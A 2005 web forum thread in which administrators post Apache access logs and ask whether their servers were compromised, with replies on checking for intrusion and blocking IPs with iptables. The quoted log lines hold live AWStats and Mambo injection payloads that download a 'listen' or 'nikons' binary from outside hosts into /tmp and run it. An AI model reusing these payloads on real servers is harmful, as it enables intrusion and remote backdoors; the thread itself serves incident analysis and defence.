Entries in access logs

tebucky · 12-16-2005, 08:48 AM

Does anyone have any knowledge that they can share regarding these apache access log entries? I am concerned that I may have been breached.

62.193.237.51 - - [15/Dec/2005:11:06:12 -0500] "GET http://70.84.135.3/~antigoth/printenv.php HTTP/1.1" 404 297 "-" "Mozilla/5.0"
66.182.53.50 - - [16/Dec/2005:04:30:36 -0500] "HEAD / HTTP/1.0" 200 - "-" "-"
131.234.140.140 - - [16/Dec/2005:08:07:35 -0500] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:36 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:37 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20128%2e173%2e40%2e113%2flisten%3bchmod%20% 2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:38 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:39 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 284 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:43 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
131.234.140.140 - - [16/Dec/2005:08:07:44 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

RaelOM · 12-16-2005, 09:41 AM

What entry in that log concerns you?

It looks fine to me.

Matir · 12-16-2005, 09:56 AM

I agree with tebucky, they do look suspicious. They look like an effort to upload some program "listen" to your /tmp directory and then execute it. I would presume the listen program probably gives them a shell on your system. Use netstat, ps, and look in /tmp to see if you see signs of anything. Also, try running chkrootkit and rkhunter. From the section of log you posted, you should be fine, as all requests returned a 404, so it would seem that your system is devoid of the vulnerable scripts. The server from which listen was being downloaded is no longer online (which surprises me, given the timestamps on your logs). The IP accessing your system belongs to the University of Paderborn in Germany, but my guess would be that it is just a compromised system that has been taken over. I do encourage you, however, to contact them if you want more information from them or just to let them know about this.

unSpawn · 12-16-2005, 12:50 PM

First guess would be a Lupper worm thing or someone exploiting a vulnerable installation of Awstats.
List all connections and then shut down all publicly accessable daemons except your ssh for mgmt purposes. Next I would forcefully logoff all users, set a new root password and use your firewall to drop all traffic except from your ssh range/IP address before you investigate any further. BTW, if it's an uni IP they're from iths either a compromised springboard or a proxy. Don't bother with that except firing off a warning they should check that system.

lawadm1 · 12-17-2005, 04:05 PM

I had some similar logs in my access_log, only I did see a status 200.
Can anyone tell me what I should look at if indeed I've been comprimised?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=
com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=
cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

tebucky · 12-19-2005, 10:53 AM

What is the best way to block entire country IP's (say all "KR" IP addresses), I would get the raw list from http://ip.ludost.net/. I was going to use the deny portion of apache's httpd.conf file but that will make the file very messy. If I installed firestarter as my firewall could I implement hundreds of IP's?

My "paranoia" stems from these entries in my access_logs. Although I believe that because I am returning a "404" I am ok, I would like to prevent this traffic altogether, Here are some examples:

199.44.194.57 - - [19/Dec/2005:09:51:59 -0500] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2b x%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 404 293 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
199.44.194.57 - - [19/Dec/2005:09:52:00 -0500] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2b x%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"

and

199.44.194.57 - - [19/Dec/2005:09:52:08 -0500] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 295 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
199.44.194.57 - - [19/Dec/2005:09:52:09 -0500] "POST /xmlrpc.php HTTP/1.1" 404 285 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
199.44.194.57 - - [19/Dec/2005:09:52:10 -0500] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

"
199.44.194.57 - - [19/Dec/2005:09:52:11 -0500] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1

TIA!

Matir · 12-19-2005, 11:26 AM

Blocking a LARGE number of IPs (i.e, the range in that list) will cause a significant slowdown in your traffic unless your system is currently VERY lightly loaded. Every item in that list will generate a comparison on EVERY packet received. This will be unhelpful. You could make it a little better by only checking SYN packets to the HTTP port, but then it would still slow down initial connections. Not to mention that it would block any legitimate users off those IP ranges. I would advise against that, but if it is neccessary, iptables would be far more efficient than apache's deny.

tebucky · 12-19-2005, 12:28 PM

Thanks Matir,

What would a sample IPtable entry look like?